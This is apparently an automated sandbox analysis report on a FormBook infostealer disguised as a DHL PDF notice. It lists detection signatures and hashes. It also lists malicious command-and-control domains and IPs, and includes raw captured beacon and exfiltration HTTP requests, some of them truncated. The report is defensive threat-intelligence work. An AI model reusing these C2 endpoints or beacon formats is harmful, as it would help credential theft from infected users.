Windows Analysis Report
DHL_Notice_pdf.exe

Overview

General Information

Sample Name: DHL_Notice_pdf.exe
Analysis ID: 831175
MD5: 771508cf2751f6dabe05758e4fa25fdf
SHA1: f6d7d33b6a340d2c370ca31a6f9677a2e5306486
SHA256: 652948efee89fdc5c6d3dc7f65a16aafabd0d224c9fcd55e5f86573f1b2c4aa1
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: DHL_Notice_pdf.exe ReversingLabs: Detection: 46%
Source: DHL_Notice_pdf.exe Virustotal: Detection: 42% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.amirah.cfd/hpb7/ Avira URL Cloud: Label: phishing
Source: http://www.amirah.cfd Avira URL Cloud: Label: phishing
Source: http://www.0dhy.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.traindic.top/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X Avira URL Cloud: Label: malware
Source: http://www.admet01.club Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/j Avira URL Cloud: Label: malware
Source: http://www.traindic.top Avira URL Cloud: Label: malware
Source: http://www.yongleproducts.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.admet01.club/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: bohndigitaltech.com Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe ReversingLabs: Detection: 27%
Machine Learning detection for sample
Source: DHL_Notice_pdf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.zkvixbqxp.exe.9f0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.zkvixbqxp.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: DHL_Notice_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_Notice_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose, 5_2_027D31A0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 4x nop then xor ebx, ebx 3_2_0040DCB4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 5_2_027C8D70
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then xor ebx, ebx 5_2_027CBEC1

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.0dhy.xyz
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: PRIVATESYSTEMSUS PRIVATESYSTEMSUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.46.160.97 198.46.160.97
Source: Joe Sandbox View IP Address: 67.222.24.48 67.222.24.48
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 76 6a 43 6f 30 4e 37 50 7a 5a 31 49 39 6a 4f 44 63 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIvjCo0N7PzZ1I9jODcQ).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 67 37 41 68 48 61 65 5f 64 34 48 38 45 2d 73 6d 41 4a 6c 57 76 33 49 61 6d 5a 37 74 30 4f 54 4d 49 32 75 4b 36 42 43 33 70 71 57 59 58 36 70 61 6c 77 7a 42 48 5a 68 42 54 59 6a 78 75 63 4e 32 6f 62 4b 6a 6e 5a 4e 70 54 74 42 71 31 38 78 4b 68 42 71 56 4a 7a 7e 73 58 79 33 44 69 6a 50 4f 55 35 4d 48 6a 6c 51 73 61 41 59 65 76 35 39 4d 28 44 4c 6b 52 2d 41 7a 50 47 65 45 4d 59 4d 6b 70 39 55 4f 66 4a 65 38 28 48 43 4c 35 32 30 59 77 64 6f 6e 6b 79 44 61 32 4f 50 32 31 74 59 58 34 7a 28 6f 4b 56 6d 74 64 35 59 59 65 58 43 6d 49 6d 4a 48 4c 30 68 6f 74 6d 52 78 75 6e 77 4b 32 6d 39 7a 4c 48 70 78 50 6b 35 47 5a 6b 69 4c 68 68 62 54 70 7a 58 54 39 55 62 59 43 39 4b 4c 70 62 64 75 76 56 57 4b 56 63 70 45 41 33 32 4e 58 63 4d 66 54 6c 45 57 38 62 64 69 34 61 70 5f 37 39 41 76 41 34 47 30 6f 53 62 6d 65 4a 42 32 4a 6a 70 65 44 4c 53 73 68 6f 73 79 6f 30 58 4f 56 41 38 6e 32 35 54 35 56 6f 32 37 74 69 61 4d 77 70 33 62 51 44 6d 4d 41 47 68 41 48 41 41 6f 71 6f 7e 4a 44 6e 37 52 6b 74 77 34 76 43 38 58 62 42 6f 4e 41 57 62 68 49 50 46 41 4b 6c 7e 65 53 38 44 41 47 32 71 58 73 4f 31 30 7e 43 4e 63 67 66 4f 74 58 6b 62 34 45 5a 72 4e 68 61 78 70 6d 47 77 50 59 38 58 4b 7e 6c 4e 7a 51 58 67 75 78 48 77 7a 65 6f 38 2d 43 4d 74 51 67 56 71 6b 4d 58 6d 49 43 57 63 72 61 43 6e 31 53 6f 71 65 6a 52 70 50 4d 58 47 4c 6f 30 54 32 51 63 43 6e 69 48 4d 66 59 4e 30 78 42 78 4b 35 73 30 31 2d 64 5a 4b 6e 58 78 43 4e 48 5a 51 77 6c 48 6c 6d 57 44 4d 57 31 77 37 4f 72 35 4a 53 37 62 45 7a 55 6c 69 77 53 6f 6a 38 63 62 4f 45 64 65 78 74 32 32 46 34 68 54 77 62 41 48 41 4d 6a 76 74 7a 57 63 68 54 4c 49 28 41 47 71 73 34 55 59 47 74 43 70 7e 75 33 4a 28 44 38 4d 38 6a 68 49 48 75 59 6c 7a 41 76 6b 65 4a 47 52 47 49 28 6a 69 43 76 47 46 6f 42 32 46 38 67 34 43 5a 65 4a 48 61 56 34 75 49 59 4f 36 55 5a 47 52 6c 45 47 47 79 7a 72 67 63 4c 4d 59 4e 54 6d 41 37 51 30 63 4c 47 7a 4e 65 6a 34 45 4a 47 36 4d 44 65 4d 6c 2d 58 73 43 76 4c 32 57 70 4b 34 4f 77 48 5f 57 5a 69 6a 62 76 4f 48 38 47 59 45 67 41 6e 62 4c 54 39 6f 4e 6b 79 4b 71 47 4a 6e 39 62 7a 46 4b 6a 38 37 6f 50 30 51 38 4b 79 6b 6d 4c 49 4e 6f 54 51 64 65 57 69 42 56 33 6a 44 38 5a 57 50 66 57 71 46 51 64 54 38 34 77 46 4a 74 55 53 6c 4d 37 34 77 44 6d 43 45 4d 72 79 43 52 61 56 69 66 50 7a 4a 45 59 44 36 51 34 48 67 42 4f 45 45 64 4a 6b 75 56 36 41 43 4f 69 6c 63 39 36 50 4a 56 43 37 7a 6c 42 5a 6d 28 62 45 59 6d 69 38 79 32 